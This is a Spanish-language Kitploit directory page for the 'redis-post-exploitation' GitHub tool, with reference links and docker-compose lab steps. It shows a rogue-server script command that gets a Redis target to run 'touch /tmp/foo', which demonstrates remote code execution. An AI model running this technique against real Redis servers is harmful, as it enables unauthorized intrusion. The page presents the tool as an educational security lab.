Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
redis-post-exploitation | Kitploit
Herramientas/GitHubGitHub/knqyf263/redis-post-exploitation
Análisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHubknqyf263/redis-post-exploitation

redis-post-exploitation

Ver Repositorio
3hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

redis-post-exploitation

Solo con fines educativos

Referencia

  • https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf
  • https://paper.seebug.org/975/

Servidor Rogue

  • https://github.com/knqyf263/redis-rogue-server

Compilar

root@kitploit:~
$ docker-compose build

Ejecutar

root@kitploit:~
$ docker-compose up -d
$ docker-compose exec rogue sh
root@kitploit:~
/rogue/redis-rogue-server # python3 rogue3.py --rhost redis --rport 6379 --lhost rogue --lport 21000
...
[<<] touch /tmp/foo

Verificar

root@kitploit:~
$ docker-compose exec redis sh
root@kitploit:~
/data # ls /tmp/
foo
Descargar herramienta